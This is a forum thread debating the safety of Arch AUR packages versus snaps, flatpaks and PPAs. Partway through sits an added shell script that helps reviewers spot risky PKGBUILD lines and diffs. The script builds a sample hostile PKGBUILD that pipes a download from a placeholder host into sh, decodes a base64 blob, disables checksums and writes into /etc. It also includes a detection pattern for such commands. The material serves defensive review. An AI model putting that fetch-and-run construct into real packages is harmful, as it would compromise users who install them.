Sigh. Alas, over the last few weeks, I've written multiple times about the risks of unverified packages from online stores. The modern world is not a friendly place. Mrk
True. But it should be noted that the (unofficial) AUR is still a less risky place compared to, e.g., PPAs in Ubuntu or snaps or flatpaks. In those cases you are installing (potentially modified) binaries which you can't really verify. In the case of an AUR package you have to trust the source (if you don't, why would you install it in the first place?), but the PKGBUILD is rather easy to read so it is relatively easy to check if it's doing shady things. So the crucial thing is that users should carefully check the PKGBUILD before installing an AUR package (and the diffs when updating it) - which is recommended again and again but, unfortunately, neglected by many users. Even worse, they often use the unofficial Chaotic repository which blindly offers most AUR packages without checking them, AFAIK. This is pure horror for every experienced Arch user.
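The review step the comment above recommends (read the PKGBUILD before building, read the diff on update) can be given a little tooling. The script below is an added example, not code from the thread or from any AUR project: it builds two constructed sample PKGBUILDs (one ordinary, one with the kind of constructs a reviewer should stop at), lists the lines that deserve a closer look, and prints the unified diff between the two as a stand-in for the diff you would read between the previously built and the updated PKGBUILD. Function names, patterns and both sample files are assumptions made for this example; the pattern list is a reading aid, not a verdict.

```shell
#!/bin/sh
# Added example (not from the thread): a review aid for AUR PKGBUILDs.
# All function names and both sample PKGBUILDs are constructed here.

WORK=$(mktemp -d)
mkdir -p "$WORK/tool-a" "$WORK/tool-b"

# Constructed "ordinary" PKGBUILD: pinned checksum, writes only under $pkgdir.
# The sha256 value is a placeholder, not a real digest.
cat > "$WORK/tool-a/PKGBUILD" <<'EOF'
pkgname=tool-a
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  install -Dm755 "$pkgname" "$pkgdir/usr/bin/$pkgname"
  install -Dm644 "$pkgname.conf" "$pkgdir/etc/$pkgname.conf"
}
EOF

# Constructed PKGBUILD with constructs a reviewer should stop at: checksum
# verification disabled, a download outside source=() piped into a shell,
# a decoded blob, and a write outside $pkgdir during package().
cat > "$WORK/tool-b/PKGBUILD" <<'EOF'
pkgname=tool-b
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')

prepare() {
  curl -fsSL https://example.invalid/bootstrap.sh | sh
}

package() {
  echo "aGVsbG8=" | base64 -d > "$pkgdir/usr/bin/$pkgname"
  cp extra.sh /etc/profile.d/extra.sh
}
EOF

# Commands that fetch, evaluate or escalate, and pipes into a shell (POSIX ERE).
RISKY='(^|[^[:alnum:]_])(curl|wget|eval|sudo)[[:space:]]|\|[[:space:]]*(ba|z)?sh([[:space:]]|$)|base64.*(-d|--decode)'

# show_suspicious PKGBUILD: print "line:text" for every line worth a second look.
show_suspicious() {
  f=$1
  {
    grep -nE "$RISKY" "$f" || true
    # SKIP is legitimate for VCS sources but turns off integrity checks for tarballs.
    grep -nE '^(md5|sha[0-9]+|b2)sums=.*SKIP' "$f" || true
    # absolute system paths that are not rooted under $pkgdir or $srcdir
    grep -nE '/(etc|usr|opt|var)/' "$f" | grep -vE '\$\{?(pkgdir|srcdir)\}?/' || true
  } | sort -t: -k1,1n -u
}

# count_suspicious PKGBUILD: number of flagged lines (0 means nothing flagged).
count_suspicious() {
  show_suspicious "$1" | grep -c . || true
}

# pkgbuild_diff OLD NEW: the diff to read before rebuilding an updated package.
# For a real AUR checkout the same reading is: git log -p -- PKGBUILD
pkgbuild_diff() {
  diff -u "$1" "$2" || true
}

echo "== flagged lines in tool-b/PKGBUILD =="
show_suspicious "$WORK/tool-b/PKGBUILD"
echo "== diff tool-a -> tool-b =="
pkgbuild_diff "$WORK/tool-a/PKGBUILD" "$WORK/tool-b/PKGBUILD"
```

The path check deliberately ignores anything rooted in `$pkgdir` or `$srcdir`, so a line such as `cp "$srcdir/x" /etc/x` would slip past it; the list is there to direct attention, and the PKGBUILD still has to be read end to end. AUR helpers such as paru and yay can show the PKGBUILD diff at update time, which covers the same step as `pkgbuild_diff` here.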
Not really. If you're installing a verified snap or flatpak, there's some assurance that you're getting what you think you're getting. Especially with snaps, as Canonical as a company has an extra duty to vet what goes into its store. PKGBUILD is only easy to read if you're super-uber-extra nerdy and know your way around. After all, the xz fiasco shows that even with the source code in the open, things are not trivial to examine. It took actual testing to discover the problem. PPAs can be ok if official, but again, if not, and/or not by the upstream developer, and similarly, unverified snaps or flatpaks, you don't know what you're getting. Could be perfectly fine, or not. Mrk
Yes, if they are verified. But there are many flatpaks (I don't know about snaps) which are not "official". Well, I don't find them very difficult to read. But anyway, it is not recommended for newbies to install AUR packages if they don't know what they are doing. There is a reason why they can't be simply installed with pacman. Yes, but that is not really related to the problem with "unverified" packages. The xz infection was really very tricky. Indeed.
The xz case merely shows that even if you have the source, very few people, if any, can figure out what's happening. There are both verified and unverified snaps and flatpaks. The problem is that most distro package managers will show both, by default. Now, you not finding them difficult to read puts you in something like 0.001% of the population, you realize that? Mrk
Which population? Arch Linux (with emphasis on Arch) and AUR are not dedicated to the general population, but anyway let's assume the general EU population for the sake of easy-to-obtain data. Sources:
https://ec.europa.eu/eurostat/statistics-explained/index.php?title=ICT_specialists_in_employment
https://ec.europa.eu/eurostat/statistics-explained/index.php?title=Population_structure_and_ageing
This means 2,23% of the general EU population is considered to be ICT specialists. The general population includes, i.e., very young children etc., who of course should not be allowed to download anything they want to a computer, and none of them are ICT specialists (yet). Yes, I understand only some ICT specialists manage and run Linux systems of any kind, though they should really quickly be able to pick that skill up. And if somebody removes people who only theoretically could pick that skill up from the numerator, then the denominator should be completely changed from the general population to only Arch Linux users. Either way it won't be below 1%. My point: being able to read a Bash script isn't really that special anymore and you underestimate that by 2 or 3 orders of magnitude.
The results prove me right, unfortunately. Also, being an IT specialist also includes: data center technicians, Windows people, database people, mainframe people, etc. Most of these never have to touch any bash script. They also wouldn't know if file1.bin is good and if file2.bin is bad. So, to answer the question, any population. Mrk